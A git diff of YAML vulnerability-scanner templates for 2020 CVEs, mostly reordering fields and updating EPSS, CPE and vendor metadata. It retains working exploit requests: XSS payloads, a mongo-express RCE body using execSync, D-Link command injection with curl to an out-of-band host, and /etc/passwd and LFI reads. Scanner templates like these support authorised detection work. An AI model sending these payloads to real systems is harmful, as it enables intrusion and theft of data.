aryanic + product: high_cms tags: cve,cve2020,xss,cms,highmail,aryanic http: @@ -29,17 +31,17 @@ http: - "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E" stop-at-first-match: true + matchers-condition: and matchers: - - type: word words: - 'value="">' - type: word + part: header words: - text/html - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-23575.yaml b/http/cves/2020/CVE-2020-23575.yaml index f9444ce951..5e0a65693e 100644 --- a/http/cves/2020/CVE-2020-23575.yaml +++ b/http/cves/2020/CVE-2020-23575.yaml @@ -14,10 +14,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23575 cwe-id: CWE-22 - epss-score: 0.02655 - tags: cve,cve2020,printer,iot,lfi,edb + epss-score: 0.01879 + cpe: cpe:2.3:o:kyocera:d-copia253mf_plus_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: kyocera + product: d-copia253mf_plus_firmware + tags: cve,cve2020,printer,iot,lfi,edb http: - method: GET diff --git a/http/cves/2020/CVE-2020-23697.yaml b/http/cves/2020/CVE-2020-23697.yaml index 2052315d04..01d7972e96 100644 --- a/http/cves/2020/CVE-2020-23697.yaml +++ b/http/cves/2020/CVE-2020-23697.yaml @@ -14,13 +14,14 @@ info: cvss-score: 5.4 cve-id: CVE-2020-23697 cwe-id: CWE-79 - cpe: cpe:2.3:a:monstra:monstra_cms:*:*:*:*:*:*:*:* epss-score: 0.0009 + cpe: cpe:2.3:a:monstra:monstra_cms:3.0.4:*:*:*:*:*:*:* metadata: max-request: 4 verified: true + vendor: monstra + product: monstra_cms tags: cve,cve2020,xss,mostra,mostracms,cms,authenticated - variables: string: "{{to_lower('{{randstr}}')}}" @@ -32,19 +33,16 @@ http: Content-Type: application/x-www-form-urlencoded login={{username}}&password={{password}}&login_submit=Log+In - - | GET /admin/index.php?id=pages&action=add_page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | POST /admin/index.php?id=pages&action=add_page HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded csrf={{csrf}}&page_title=%22%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&page_name={{string}}&page_meta_title=&page_keywords=&page_description=&pages=0&templates=index&status=published&access=public&editor=test&page_tags=&add_page_and_exit=Save+and+Exit&page_date=2023-01-09+18%3A22%3A15 - - | GET /{{string}} HTTP/1.1 Host: {{Hostname}} @@ -61,8 +59,8 @@ http: extractors: - type: regex name: csrf - part: body group: 1 regex: - 'id="csrf" name="csrf" value="(.*)">' internal: true + part: body diff --git a/http/cves/2020/CVE-2020-23972.yaml b/http/cves/2020/CVE-2020-23972.yaml index 4b6ab473ab..bdc8f54ca1 100644 --- a/http/cves/2020/CVE-2020-23972.yaml +++ b/http/cves/2020/CVE-2020-23972.yaml @@ -17,11 +17,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-23972 cwe-id: CWE-434 - cpe: cpe:2.3:a:gmapfp:gmapfp:*:*:*:*:*:*:*:* - epss-score: 0.66354 - tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive + epss-score: 0.68335 + cpe: cpe:2.3:a:gmapfp:gmapfp:j3.5:*:*:*:-:joomla\!:*:* metadata: max-request: 2 + framework: joomla\! + vendor: gmapfp + product: gmapfp + tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive http: - raw: @@ -56,6 +59,6 @@ http: extractors: - type: regex - part: body regex: - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);" + part: body diff --git a/http/cves/2020/CVE-2020-24148.yaml b/http/cves/2020/CVE-2020-24148.yaml index 9cd7d4a7ac..29ace0f6d3 100644 --- a/http/cves/2020/CVE-2020-24148.yaml +++ b/http/cves/2020/CVE-2020-24148.yaml @@ -15,16 +15,20 @@ info: cvss-score: 9.1 cve-id: CVE-2020-24148 cwe-id: CWE-918 - cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:*:*:*:*:*:*:*:* epss-score: 0.06154 - tags: cve,cve2020,wordpress,wp-plugin,ssrf + cpe: cpe:2.3:a:mooveagency:import_xml_and_rss_feeds:2.0.1:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: mooveagency + product: import_xml_and_rss_feeds + tags: cve,cve2020,wordpress,wp-plugin,ssrf http: - method: POST path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=moove_read_xml" + body: "type=url&data=http%3A%2F%2F{{interactsh-url}}%2F&xmlaction=preview&node=0" matchers: - type: word diff --git a/http/cves/2020/CVE-2020-24186.yaml b/http/cves/2020/CVE-2020-24186.yaml index 607e7c0494..0da13314fd 100644 --- a/http/cves/2020/CVE-2020-24186.yaml +++ b/http/cves/2020/CVE-2020-24186.yaml @@ -15,11 +15,14 @@ info: cvss-score: 10 cve-id: CVE-2020-24186 cwe-id: CWE-434 - cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:*:*:* - epss-score: 0.97485 - tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive + epss-score: 0.97446 + cpe: cpe:2.3:a:gvectors:wpdiscuz:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 + framework: wordpress + vendor: gvectors + product: wpdiscuz + tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive http: - raw: @@ -27,7 +30,6 @@ http: GET /?p=1 HTTP/1.1 Host: {{Hostname}} Accept: */* - - | POST /wp-admin/admin-ajax.php HTTP/1.1 Host: {{Hostname}} @@ -60,21 +62,6 @@ http: 1 ------WebKitFormBoundary88AhjLimsDMHU1Ak-- - extractors: - - type: regex - part: body - internal: true - name: wmuSecurity - group: 1 - regex: - - 'wmuSecurity":"([a-z0-9]+)' - - - type: regex - part: body - group: 1 - regex: - - '"url":"([a-z:\\/0-9-.]+)"' - matchers-condition: and matchers: - type: word @@ -89,3 +76,18 @@ http: - type: status status: - 200 + + extractors: + - type: regex + name: wmuSecurity + group: 1 + regex: + - 'wmuSecurity":"([a-z0-9]+)' + internal: true + part: body + + - type: regex + group: 1 + regex: + - '"url":"([a-z:\\/0-9-.]+)"' + part: body diff --git a/http/cves/2020/CVE-2020-24223.yaml b/http/cves/2020/CVE-2020-24223.yaml index 46a2f3f962..2e9b0d2757 100644 --- a/http/cves/2020/CVE-2020-24223.yaml +++ b/http/cves/2020/CVE-2020-24223.yaml @@ -15,26 +15,31 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24223 cwe-id: CWE-79 - cpe: cpe:2.3:a:mara_cms_project:mara_cms:*:*:*:*:*:*:*:* - epss-score: 0.01034 - tags: cve,cve2020,mara,xss,edb + epss-score: 0.00976 + cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: mara_cms_project + product: mara_cms + tags: cve,cve2020,mara,xss,edb http: - method: GET path: - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + matchers-condition: and matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - "text/html" + - type: status status: - 200 - - type: word - words: - - '">' - part: body - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-24312.yaml b/http/cves/2020/CVE-2020-24312.yaml index 05d170cd6f..5dde1284ee 100644 --- a/http/cves/2020/CVE-2020-24312.yaml +++ b/http/cves/2020/CVE-2020-24312.yaml @@ -14,11 +14,14 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24312 cwe-id: CWE-552 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:*:*:* - epss-score: 0.02595 - tags: cve,cve2020,wordpress,backups,plugin + epss-score: 0.02033 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: webdesi9 + product: file_manager + tags: cve,cve2020,wordpress,backups,plugin http: - method: GET @@ -27,13 +30,13 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word words: - 'Index of' - 'wp-content/uploads/wp-file-manager-pro/fm_backup' - 'backup_' condition: and + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-24391.yaml b/http/cves/2020/CVE-2020-24391.yaml index 1c24adb7d9..40ce478a1f 100644 --- a/http/cves/2020/CVE-2020-24391.yaml +++ b/http/cves/2020/CVE-2020-24391.yaml @@ -14,31 +14,33 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-24391 - cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:*:*:* - epss-score: 0.49283 - tags: cve,cve2020,mongo,express,rce,intrusive + epss-score: 0.48236 + cpe: cpe:2.3:a:mongo-express_project:mongo-express:*:*:*:*:*:node.js:*:* metadata: max-request: 3 + framework: node.js + vendor: mongo-express_project + product: mongo-express + tags: cve,cve2020,mongo,express,rce,intrusive http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} - - | POST /checkValid HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++ - - | GET /public/css/{{randstr}}.css HTTP/1.1 Host: {{Hostname}} - req-condition: true cookie-reuse: true + req-condition: true + matchers-condition: and matchers: - type: regex diff --git a/http/cves/2020/CVE-2020-24550.yaml b/http/cves/2020/CVE-2020-24550.yaml index 94ea1bf799..4884a2309a 100644 --- a/http/cves/2020/CVE-2020-24550.yaml +++ b/http/cves/2020/CVE-2020-24550.yaml @@ -13,11 +13,13 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24550 cwe-id: CWE-601 - cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* epss-score: 0.00157 - tags: cve,cve2020,redirect,episerver + cpe: cpe:2.3:a:episerver:find:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: episerver + product: find + tags: cve,cve2020,redirect,episerver http: - method: GET diff --git a/http/cves/2020/CVE-2020-24571.yaml b/http/cves/2020/CVE-2020-24571.yaml index 9160dd33a2..18be48982a 100644 --- a/http/cves/2020/CVE-2020-24571.yaml +++ b/http/cves/2020/CVE-2020-24571.yaml @@ -13,11 +13,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-24571 cwe-id: CWE-22 + epss-score: 0.02885 cpe: cpe:2.3:a:nexusdb:nexusdb:*:*:*:*:*:*:*:* - epss-score: 0.03491 - tags: cve,cve2020,nexusdb,lfi metadata: max-request: 1 + vendor: nexusdb + product: nexusdb + tags: cve,cve2020,nexusdb,lfi http: - method: GET @@ -27,9 +29,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "[extensions]" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-24579.yaml b/http/cves/2020/CVE-2020-24579.yaml index 64ba8d0b50..11426fb13d 100644 --- a/http/cves/2020/CVE-2020-24579.yaml +++ b/http/cves/2020/CVE-2020-24579.yaml @@ -14,10 +14,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24579 cwe-id: CWE-287 - epss-score: 0.00215 - tags: cve,cve2020,dlink,rce + epss-score: 0.00642 + cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: dlink + product: dsl2888a_firmware + tags: cve,cve2020,dlink,rce http: - raw: @@ -27,7 +30,6 @@ http: Cookie: uid=6gPjT2ipmNz username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b - - | # Get /etc/passwd GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} @@ -35,12 +37,12 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - - type: regex regex: - "nobody:[x*]:65534:65534" - "root:.*:0:0:" condition: or + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-24589.yaml b/http/cves/2020/CVE-2020-24589.yaml index 0a44ef2582..5336c2ad97 100644 --- a/http/cves/2020/CVE-2020-24589.yaml +++ b/http/cves/2020/CVE-2020-24589.yaml @@ -12,10 +12,14 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H cvss-score: 9.1 cve-id: CVE-2020-24589 - epss-score: 0.48841 - tags: cve,cve2020,wso2,xxe,oast,blind + cwe-id: CWE-611 + epss-score: 0.55262 + cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wso2 + product: api_manager + tags: cve,cve2020,wso2,xxe,oast,blind http: - raw: diff --git a/http/cves/2020/CVE-2020-24902.yaml b/http/cves/2020/CVE-2020-24902.yaml index 90193f2ad5..c2569a13b5 100644 --- a/http/cves/2020/CVE-2020-24902.yaml +++ b/http/cves/2020/CVE-2020-24902.yaml @@ -14,13 +14,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24902 cwe-id: CWE-79 - cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* epss-score: 0.00171 + cpe: cpe:2.3:a:quixplorer_project:quixplorer:*:*:*:*:*:*:*:* metadata: max-request: 1 google-query: intitle:"My Download Server" shodan-query: http.title:"My Download Server" verified: true + vendor: quixplorer_project + product: quixplorer tags: cve,cve2020,quixplorer,xss http: @@ -30,6 +32,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-24903.yaml b/http/cves/2020/CVE-2020-24903.yaml index eeda313f3c..b55b207bdc 100644 --- a/http/cves/2020/CVE-2020-24903.yaml +++ b/http/cves/2020/CVE-2020-24903.yaml @@ -14,12 +14,15 @@ info: cvss-score: 6.1 cve-id: CVE-2020-24903 cwe-id: CWE-79 - cpe: cpe:2.3:a:cutesoft:cute_editor:*:*:*:*:*:*:*:* epss-score: 0.00246 + cpe: cpe:2.3:a:cutesoft:cute_editor:6.4:*:*:*:*:asp.net:*:* metadata: max-request: 1 shodan-query: http.component:"ASP.NET" verified: true + framework: asp.net + vendor: cutesoft + product: cute_editor tags: cve,cve2020,cuteeditor,xss,seclists http: diff --git a/http/cves/2020/CVE-2020-24912.yaml b/http/cves/2020/CVE-2020-24912.yaml index 7cc5e8d6c4..f3c9ff5e48 100644 --- a/http/cves/2020/CVE-2020-24912.yaml +++ b/http/cves/2020/CVE-2020-24912.yaml @@ -10,16 +10,19 @@ info: - https://github.com/qcubed/qcubed/pull/1320/files - https://nvd.nist.gov/vuln/detail/CVE-2020-24912 - http://seclists.org/fulldisclosure/2021/Mar/30 + - http://qcubed.com classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-24912 cwe-id: CWE-79 - cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* epss-score: 0.00187 - tags: cve,cve2020,qcubed,xss,seclists + cpe: cpe:2.3:a:qcubed:qcubed:*:*:*:*:*:*:*:* metadata: max-request: 3 + vendor: qcubed + product: qcubed + tags: cve,cve2020,qcubed,xss,seclists http: - method: POST @@ -27,19 +30,20 @@ http: - "{{BaseURL}}/assets/_core/php/profile.php" - "{{BaseURL}}/assets/php/profile.php" - "{{BaseURL}}/vendor/qcubed/qcubed/assets/php/profile.php" + + body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" + headers: Content-Type: application/x-www-form-urlencoded - body: "intDatabaseIndex=1&StrReferrer=somethinxg&strProfileData=YToxOntpOjA7YTozOntzOjEyOiJvYmpCYWNrdHJhY2UiO2E6MTp7czo0OiJhcmdzIjthOjE6e2k6MDtzOjM6IlBXTiI7fX1zOjg6InN0clF1ZXJ5IjtzOjExMjoic2VsZWN0IHZlcnNpb24oKTsgc2VsZWN0IGNvbnZlcnRfZnJvbShkZWNvZGUoJCRQSE5qY21sd2RENWhiR1Z5ZENnbmVITnpKeWs4TDNOamNtbHdkRDRLJCQsJCRiYXNlNjQkJCksJCR1dGYtOCQkKSI7czoxMToiZGJsVGltZUluZm8iO3M6MToiMSI7fX0K=" matchers-condition: and matchers: - - type: word + part: body words: - "" - part: body - type: word + part: header words: - 'Content-Type: text/html' - part: header diff --git a/http/cves/2020/CVE-2020-24949.yaml b/http/cves/2020/CVE-2020-24949.yaml index 0585a2aa89..c306a273d1 100644 --- a/http/cves/2020/CVE-2020-24949.yaml +++ b/http/cves/2020/CVE-2020-24949.yaml @@ -15,11 +15,13 @@ info: cvss-score: 8.8 cve-id: CVE-2020-24949 cwe-id: CWE-77 - cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:* - epss-score: 0.96895 - tags: rce,php,packetstorm,cve,cve2020,phpfusion + epss-score: 0.96607 + cpe: cpe:2.3:a:php-fusion:php-fusion:9.03.50:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: php-fusion + product: php-fusion + tags: rce,php,packetstorm,cve,cve2020,phpfusion http: - method: GET @@ -28,12 +30,11 @@ http: matchers-condition: and matchers: - - - type: status - status: - - 200 - - type: word part: body words: - "infusion_db.php" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-25078.yaml b/http/cves/2020/CVE-2020-25078.yaml index 2b62b93f05..642eb77ca6 100644 --- a/http/cves/2020/CVE-2020-25078.yaml +++ b/http/cves/2020/CVE-2020-25078.yaml @@ -13,10 +13,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-25078 - epss-score: 0.96698 - tags: cve,cve2020,dlink + epss-score: 0.96829 + cpe: cpe:2.3:o:dlink:dcs-2530l_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: dlink + product: dcs-2530l_firmware + tags: cve,cve2020,dlink http: - method: GET @@ -32,9 +35,9 @@ http: condition: and - type: word + part: header words: - "text/plain" - part: header - type: status status: diff --git a/http/cves/2020/CVE-2020-25213.yaml b/http/cves/2020/CVE-2020-25213.yaml index cb9e86ae2b..c6de6f2eee 100644 --- a/http/cves/2020/CVE-2020-25213.yaml +++ b/http/cves/2020/CVE-2020-25213.yaml @@ -2,7 +2,6 @@ id: CVE-2020-25213 # Uploaded file will be accessible at:- # http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt - info: name: WordPress File Manager Plugin - Remote Code Execution author: foulenzer @@ -13,15 +12,19 @@ info: - https://github.com/w4fz5uck5/wp-file-manager-0day - https://nvd.nist.gov/vuln/detail/CVE-2020-25213 - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html + - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25213 cwe-id: CWE-434 - cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:*:*:* - epss-score: 0.97389 + epss-score: 0.9739 + cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: webdesi9 + product: file_manager tags: wordpress,rce,kev,fileupload,intrusive,packetstorm,cve,cve2020 http: @@ -70,4 +73,4 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/http/cves/2020/CVE-2020-25223.yaml b/http/cves/2020/CVE-2020-25223.yaml index a5ab7da6f3..a6339d368d 100644 --- a/http/cves/2020/CVE-2020-25223.yaml +++ b/http/cves/2020/CVE-2020-25223.yaml @@ -10,15 +10,19 @@ info: - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223 - https://nvd.nist.gov/vuln/detail/CVE-2020-25223 - https://community.sophos.com/b/security-blog + - https://cwe.mitre.org/data/definitions/78.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25223 + cwe-id: CWE-78 + epss-score: 0.97526 cpe: cpe:2.3:a:sophos:unified_threat_management:*:*:*:*:*:*:*:* - epss-score: 0.97478 - tags: cve,cve2020,sophos,rce,oast,unauth,kev metadata: max-request: 1 + vendor: sophos + product: unified_threat_management + tags: cve,cve2020,sophos,rce,oast,unauth,kev http: - raw: diff --git a/http/cves/2020/CVE-2020-25495.yaml b/http/cves/2020/CVE-2020-25495.yaml index b99a0caf06..b7cd395530 100644 --- a/http/cves/2020/CVE-2020-25495.yaml +++ b/http/cves/2020/CVE-2020-25495.yaml @@ -15,29 +15,31 @@ info: cvss-score: 6.1 cve-id: CVE-2020-25495 cwe-id: CWE-79 - cpe: cpe:2.3:a:xinuos:openserver:*:*:*:*:*:*:*:* epss-score: 0.00153 - tags: cve,cve2020,sco,xss,edb,packetstorm + cpe: cpe:2.3:a:xinuos:openserver:5.0.7:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: xinuos + product: openserver + tags: cve,cve2020,sco,xss,edb,packetstorm,intrusive http: - method: GET path: - - '{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E' + - "{{BaseURL}}/cgi-bin/manlist?section=%22%3E%3Ch1%3Ehello%3C%2Fh1%3E%3Cscript%3Ealert(/{{randstr}}/)%3C%2Fscript%3E" matchers-condition: and matchers: + - type: word + part: body + words: + -

    hello

    + + - type: word + part: header + words: + - text/html + - type: status status: - 200 - - - type: word - words: - - "

    hello

    " - part: body - - - type: word - words: - - "text/html" - part: header diff --git a/http/cves/2020/CVE-2020-25506.yaml b/http/cves/2020/CVE-2020-25506.yaml index b04cc45316..359e63fa98 100644 --- a/http/cves/2020/CVE-2020-25506.yaml +++ b/http/cves/2020/CVE-2020-25506.yaml @@ -9,16 +9,20 @@ info: - https://gist.github.com/WinMin/6f63fd1ae95977e0e2d49bd4b5f00675 - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2020-25506 + - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10183 + - https://www.dlink.com/en/security-bulletin/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-25506 cwe-id: CWE-78 - epss-score: 0.97445 - tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev + epss-score: 0.97451 + cpe: cpe:2.3:o:dlink:dns-320_firmware:2.06b01:*:*:*:*:*:*:* metadata: max-request: 2 - + vendor: dlink + product: dns-320_firmware + tags: cve,cve2020,dlink,rce,oast,mirai,unauth,router,kev variables: useragent: '{{rand_base(6)}}' @@ -30,7 +34,6 @@ http: Accept: */* C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` - - | POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'` HTTP/1.1 Host: {{Hostname}} @@ -39,7 +42,7 @@ http: matchers-condition: and matchers: - type: word - part: interactsh_protocol # Confirms the HTTP Interaction + part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" diff --git a/http/cves/2020/CVE-2020-2551.yaml b/http/cves/2020/CVE-2020-2551.yaml index dc1dd03241..1178ef1a59 100644 --- a/http/cves/2020/CVE-2020-2551.yaml +++ b/http/cves/2020/CVE-2020-2551.yaml @@ -14,11 +14,13 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-2551 - cpe: cpe:2.3:a:oracle:weblogic_server:*:*:*:*:*:*:*:* - epss-score: 0.97281 - tags: cve,cve2020,oracle,weblogic,rce,unauth + epss-score: 0.97468 + cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: oracle + product: weblogic_server + tags: cve,cve2020,oracle,weblogic,rce,unauth http: - method: GET @@ -28,18 +30,18 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "10.3.6.0" - "12.1.3.0" - "12.2.1.3" - "12.2.1.4" condition: or - part: body - type: word + part: body words: - "WebLogic" - part: body - type: status status: diff --git a/http/cves/2020/CVE-2020-25540.yaml b/http/cves/2020/CVE-2020-25540.yaml index d5d2f94c94..75237d4018 100644 --- a/http/cves/2020/CVE-2020-25540.yaml +++ b/http/cves/2020/CVE-2020-25540.yaml @@ -16,11 +16,13 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25540 cwe-id: CWE-22 - cpe: cpe:2.3:a:ctolog:thinkadmin:*:*:*:*:*:*:*:* - epss-score: 0.96472 - tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 + epss-score: 0.96525 + cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ctolog + product: thinkadmin + tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 http: - method: GET @@ -29,9 +31,10 @@ http: matchers-condition: and matchers: - - type: status - status: - - 200 - type: regex regex: - "root:.*:0:0:" + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-25780.yaml b/http/cves/2020/CVE-2020-25780.yaml index ccfac95ef6..fd1d78a082 100644 --- a/http/cves/2020/CVE-2020-25780.yaml +++ b/http/cves/2020/CVE-2020-25780.yaml @@ -14,32 +14,34 @@ info: cvss-score: 7.5 cve-id: CVE-2020-25780 cwe-id: CWE-22 + epss-score: 0.01865 cpe: cpe:2.3:a:commvault:commcell:*:*:*:*:*:*:*:* - epss-score: 0.03084 - tags: cve,cve2020,commvault,lfi metadata: max-request: 1 + vendor: commvault + product: commcell + tags: cve,cve2020,commvault,lfi http: - method: POST path: - "http://{{Host}}:81/SearchSvc/CVSearchService.svc" + body: | + + + + + c:/Windows/system.ini + + + + headers: Cookie: Login soapaction: http://tempuri.org/ICVSearchSvc/downLoadFile content-type: text/xml - body: | - - - - - c:/Windows/system.ini - - - - matchers-condition: and matchers: - type: word diff --git a/http/cves/2020/CVE-2020-25864.yaml b/http/cves/2020/CVE-2020-25864.yaml index 806ac341a5..1c000c4bc5 100644 --- a/http/cves/2020/CVE-2020-25864.yaml +++ b/http/cves/2020/CVE-2020-25864.yaml @@ -10,17 +10,20 @@ info: - https://discuss.hashicorp.com/t/hcsec-2021-07-consul-api-kv-endpoint-vulnerable-to-cross-site-scripting/23368 - https://www.hashicorp.com/blog/category/consul - https://nvd.nist.gov/vuln/detail/CVE-2020-25864 + - https://security.gentoo.org/glsa/202208-09 remediation: Fixed in 1.9.5, 1.8.10 and 1.7.14. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2020-25864 cwe-id: CWE-79 - cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:*:*:*:* epss-score: 0.00255 - tags: cve,cve2020,consul,xss + cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:* metadata: max-request: 2 + vendor: hashicorp + product: consul + tags: cve,cve2020,consul,xss,intrusive http: - raw: @@ -29,24 +32,24 @@ http: Host: {{Hostname}} - - | GET {{BaseURL}}/v1/kv/{{randstr}}%3Fraw HTTP/1.1 Host: {{Hostname}} req-condition: true + matchers-condition: and matchers: - - type: status - status: - - 200 - - type: word part: header words: - - "text/html" + - text/html - type: word part: body_2 words: - - "" + - + + - type: status + status: + - 200 diff --git a/http/cves/2020/CVE-2020-26153.yaml b/http/cves/2020/CVE-2020-26153.yaml index eaca48af7b..f8cabdf4d4 100644 --- a/http/cves/2020/CVE-2020-26153.yaml +++ b/http/cves/2020/CVE-2020-26153.yaml @@ -15,11 +15,14 @@ info: cvss-score: 6.1 cve-id: CVE-2020-26153 cwe-id: CWE-79 - cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:*:*:* epss-score: 0.00127 - tags: cve,cve2020,xss,wordpress,wp-plugin + cpe: cpe:2.3:a:eventespresso:event_espresso:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 + framework: wordpress + vendor: eventespresso + product: event_espresso + tags: cve,cve2020,xss,wordpress,wp-plugin http: - method: GET @@ -29,15 +32,15 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '"/>' - part: body - - - type: status - status: - - 500 - type: word part: header words: - text/html + + - type: status + status: + - 500 diff --git 